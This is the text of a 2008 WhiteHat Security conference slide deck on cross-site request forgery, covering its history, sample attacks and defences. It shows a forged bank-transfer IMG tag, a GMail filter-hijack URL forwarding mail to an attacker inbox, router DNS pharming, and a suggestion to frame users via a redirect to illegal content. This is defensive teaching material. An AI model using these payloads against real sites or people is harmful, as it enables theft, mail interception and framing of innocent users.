Cross-Site Request Forgery“The Sleeping Giant of Website Vulnerabilities”

Jeremiah Grossman | WhiteHat Security | 04/09/08 | Session Code: HT1-20304

Jeremiah Grossman– WhiteHat Security Founder & CTO– Technology R&D and industry evangelist

(Named to InfoWorld's CTO Top 25 for 2007)– Frequent international conference speaker– Co-founder of the Web Application

Security Consortium– Co-author: Cross-Site Scripting Attacks– Former Yahoo! information security officer

SymantecQualysNessusnCircle

WhiteHatSecurity

“well-known”vulnerabilities

Vulnerability Stack

Focus on “custom web applications”

Target #1– 162 million websites– 809,000+ websites with SSL-certificates– Many are mission-critical and gateways to highly sensitive customer

and corporate information– These websites are accessible by over 1 billion people

Cross-Site Scripting (XSS) - forcing malicious content to beserved by a trusted website to an unsuspecting user.

Cross-Site Request Forgery (CSRF) - forcing an unsuspectinguser’s browser to send requests they didn’t intend. (wiretransfer, blog post, etc.)

JavaScript Malware - payload of an XSS or CSRF attack,typically written in JavaScript, and executed in a browser.

The big 3!

What's in a name?

1988

Confused DeputyOriginal CSRF theory

2000

Client-Side TrojansZope discovers Webversion of ConfusedDeputy

Cross Site Request ForgeryPeter Watkins discovers Client-SideTrojans, CSRF, pronounces it "seasurf"

2001

Session RidingThomas Schreiber discoversCSRF, writes a white paper,changes the name

2004

XSRFJesse Burns (iSec), writes a whitepaper, likes this acronym better

2005

Samy WormWeb Worm infects 1 millonMySpace profiles usingXSS/CSRF

2005

Intranet HackingWhiteHat Security discovers JavaScriptcan use CSRF to perform browser portscanning

2006

MITRE CVE TrendsSays CSRF is under reportedand predicts stats increase

2007

OWASP CSRFCSRF added as #5on the OWASP Top Ten project

2007

Cross-Site Request ForgeriesSession RidingClient-Side TrojansConfused DeputyWeb Trojans

Confused?

Cross-Site Request ForgeriesSession RidingClient-Side TrojansConfused DeputyWeb Trojans

Confused?

Timeline

Domain StealingCSRF used to hi-jack Gmail accountsand take control over domain names

2007

Drive-by-PharmingCSRF used to target DSL Routersto modify DNS settings to apopular bank in Mexico.

2008

How prevalent is CSRF?

No statistics exist, no one canscan for it, and nearly allissues are found by hand

Ask the Experts

• Just about every important feature of every website is vulnerable.

• Ask MITRE: “Cross-Site Request Forgery (CSRF) remains a ‘sleeping giant’[Grossman]. CSRF appears very rarely in CVE, less than 0.1% in 2006, but its trueprevalence is probably far greater than this. This is in stark contrast to the resultsfound by web application security experts including Jeremiah Grossman, RSnake,Andrew van der Stock, and Jeff Williams. These researchers regularly find CSRFduring contract work, noting that it is currently not easy to detect automatically. Thedearth of CSRF in CVE suggests that non-contract researchers are simply notinvestigating this issue. If (and when) researchers begin to focus on this issue, therewill likely be a significant increase in CSRF reports.”

• Ask OWASP: “Cross Site Request Forgery (CSRF) is the major new addition to thisedition of the OWASP Top 10. Although raw data ranks it at #36, we believe that it isimportant enough that applications should start protection efforts today, particularlyfor high value applications and applications which deal with sensitive data. CSRF ismore prevalent than its current ranking would indicate, and it can be highlydangerous.”

“...estimated that 51 percent of websites hosting maliciouscode over the past six months were legitimate destinationsthat had been hacked, as opposed to sites specifically set upby criminals. Compromised websites can pose a greater riskbecause they often come with a degree of trust.”Websense

Getting infected with JavaScript Malware• Website owner embedded JavaScript malware.• Web page defaced with embedded JavaScript malware.• Clicked on a specially-crafted malicious link.• JavaScript Malware injected into a public area of a website.

The Anatomy of a CSRF AttackA user is logged-in to a Web bank with a“Transfer Funds” feature. After specifying the“From” account, “To” account, and dollaramount, the user clicks the “Continue” button.

Let’s say the “From” account is “314159265,”the “To” account is “011235813,” and we’retransferring $5,000.

The Web browser issues an HTTP request to the Web server executing theprocess. The form values are located within the POST body and the sessioncredential (Cookie) in the headers. If the request was successful, $5,000 would betransferred from account “314159265” to account “01123581.”

POST http://webbank/transfer_funds.cgi HTTP/1.1Host: webbankUser-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O;) Firefox/1.4.1Cookie: JSPSESSIONID=4353DD35694D47990BCDF36271740A0C

from=314159265&to=011235813&amount=5000&date=11072006

Many Web applications, such as transfer_funds.cgi, do not distinguishbetween parameters sent using GET or POST. Transfer Funds could beinitiated using GET. In Figure 3, the POST method is replaced by GETand the parameters in the HTTP body have been added to the querystring.

GEThttp://webbank/transfer_funds.cgi?from=314159265&to=011235813&amount=5000&date=11072006 HTTP/1.1Host: webbankUser-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US;)Firefox/1.4.1Cookie: JSPSESSIONID= 4353DD35694D47990BCDF36271740A0C

Converting POST to GET is not required, JavaScriptcan issue POSTs through Web Forms.

POST is NOT a Solution

When bank customers are still logged-in, they may stumble across a Web pagecontaining the HTML. A customer may find this link in a phishing email,message board post, instant message spam, etc. The SRC attribute of the IMGtag has a similar URL value to that of Figure 3, but has been updated withanother account number.

<IMG SRC=http://webbank/transfer_funds.cgi?from=314159265&to=1618&amount=5000&date=11072006>

The IMG tag forces a “forged” request and if the customer is still logged-in,$5,000 from account “314159265” will be sent to account “1618,” belonging tothe hacker. To the online bank the request completely legitimate. CSRFattacks succeed because the customer is the one who is actually making therequest by automatically sending the session credentials (cookies).

The Hack

Can:Force a user to make any HTTP request to anywhere.Can’t:Read the web page that is returned in the browser.

attacker.comattacker.com

attacker.com

Same-OriginPolicy

bank.combank.com

Read OK

Read Error

CSRF Can and Can Not Do

Make Someone Buy Now with Amazon 0-Click1) Attacker creates a web page,

containing a piece of CSRF exploitcode, then waits.

2) When a logged-in Amazon userviews the page, the CSRF exploitcode silently forces a 1-Clickpurchase on any product and any“ship to”: address.

3) Attacker waits for their loot to arrive.

Force Google Searches

Get something “odd” to show up in a persons search history:

<img src=”myprinter:9100/Printed_from_the_web”>

GMail E-mail Hijack Technique• Victim visits a web page containing JavaScript malware. The

JavaScript malware forces the user to make a multipart/form-dataform submission to GMail (CSRF). http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter

• If the user is logged-in, a filter is entered into the user’s account,which they are unlikely to notice, that forwards all their email to“evilinbox@mailinator.com”.

Attacks can penetrate the intranet bycontrolling/hijacking a user’s browser andusing JavaScript Malware, which is on theinside of the network.

Intranet Hacking

Cross-Site Scripting (Printer Spamming)“By using only JavaScript, an Internet web site can remotely print toan internal network based printer by doing an HTTP Post. The website initiating the print request can print full text, enter PostScriptcommands allowing the page to be formatted, and in some casessend faxes. For the attack to succeed the user needs to visit a website that contains this JavaScript. ” - Aaron Weaver

<img src=”myprinter:9100/Printed_from_the_web”>

Drive-by-PharmingIntranet Hacking Exploited in the Wild

1. Victim user receives an e-card from an attacker.2. E-card contains HTML IMG tag that sends an HTTP GET request to

their router modifying the DNS settings so that the URL for apopular Mexico-based banking site would be mapped to anattacker’s Web site. (Password bypassed)

3. Subsequent visits to the banking website using the same computerwould be directed to the attacker’s site where their credentialswould be stolen.

Click A Link, Go To Jail (10 years)1. FBI posts links claiming to be illegal content of minors having sex

on a government controlled server.2. Anyone who clicks on the links is charged with violating the federal

child pornography law and their home is raided.3. Search warrants have been found to be legal, even though there is

no direct evidence of what person behind the IP address clicked thelink and no HTTP referer information is captured.

If you want to give someone a really bad day, put something like this in yourweb pages.

<META HTTP-EQUIV="refresh" CONTENT="0;url=http://child-porn-site">

Consider forcing users from China to access “illegal” content, initating hackingattempts against government systems, participate in a DDoS attack, etc. Thelist is endless.

CSRF Solutions (Secrets)Tokenhttp://server/webapp?token=02c425157ecd32f259548b33402ff6d3aetoken = digest(session_id + salt) + saltsalt = 2-byte (at least) random value

Are you sure? Yes or No.Effectively implemented as the solution above, just another method.

Please enter your password to confirm.Again, same solution but user’s password substituted for the secret token.

XSS vulnerabilitiesbypass all CSRF

protections

MySpace (Samy Worm)First major XSS/CSRF worm24 hours, 1 million users affected

CROSS-SITE SCRIPTING WORMS AND VIRUSES“The Impending Threat and the Best Defense”

http://www.whitehatsec.com/downloads/WHXSSThreats.pdf

Samy used XSS to bypass CSRF (secrettoken) protections

Web Worms

1) Logged-in user views Samy’s profile page,embedded JavaScript malware.

2) Malware adds Samy as their friend,updates their profile with “Samy is myhero,” and copies the malware to theirprofile.

3) People visiting infected profiles are in turninfected causing exponential growth.

Code SecurityInput Validation• Character-set - Only contain characters you expect to receive.• Length - Restricted to a minimum and maximum number of

bytes.Data• Format - Data is consistent with what is expected. Phone should

look like phone numbers, email addresses should look like emailaddress, etc.

XSS Output Filtering (HTML Encoding)• $data =~ s/(<|>|\"|\'|\(|\)|:)/'&#'.ord($1).';'/sge;• $data =~ s/([^\w])/'&#'.ord($1).';'/sge;

Web Browser Security• Stay patched and install browser add-ons – NoScript, SafeHistory,

CustomizeGoogle, Adblock Plus, Netcraft Toolbar, and the eBay Toolbar.

• Logout of websites when work is completed, especially the sensitive ones.

• Be suspicious of long links, most importantly those containing HTML code.Best to type the domain name manually into your browser location bar.

• Disable – Java, Flash, and Active X prior to visiting questionable websites.Can’t really disable JavaScript anymore.

• Surf with two Web browsers – A primary is used for everyday surfing only.The secondary is used for “important” business only – use bookmarks,login, do your work, logout, and exit.

• VMWare Web surfing for the paranoid. If anything bad should happen, thelocal machine and data remains safe.

For more information visit: www.whitehatsec.com

Jeremiah Grossman, founder and CTOblog: http://jeremiahgrossman.blogspot.comemail: jeremiah@whitehatsec.com

Thank You!Thank You!

The Cross-Site Request Forgery (CSRF/XSRF) FAQhttp://www.cgisecurity.com/articles/csrf-faq.shtml

The Confused Deputy - Original Cross-Site Request Forgery Theoryhttp://www.cap-lore.com/CapTheory/ConfusedDeputy.html

Zope discovers a Web version of the Confused Deputy, calls it Client-Side Trojanshttp://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan

Peter Watkins discovers Client-Side Trojans, calls it (CSRF, pronounced "sea surf")http://www.tux.org/~peterw/csrf.txt

Thomas Schreiber discovers CSRF, doesn't like the name, calls it SessionRidinghttp://www.securenet.de/papers/Session_Riding.pdf

Jesse Burns discovers CSRF, doesn't like the acronym, changes it toXSRF.http://www.isecpartners.com/files/XSRF_Paper_0.pdf

Intranet Hacking from the Outside and JavaScript PortScanninghttp://jeremiahgrossman.blogspot.com/2006/09/video-hacking-intranet-websites-from.html

MITRE - Vulnerability Type Distributions in CVEhttp://cve.mitre.org/docs/vuln-trends/index.html

OWASP Top Ten 2007http://www.owasp.org/index.php/Top_10_2007-A5

References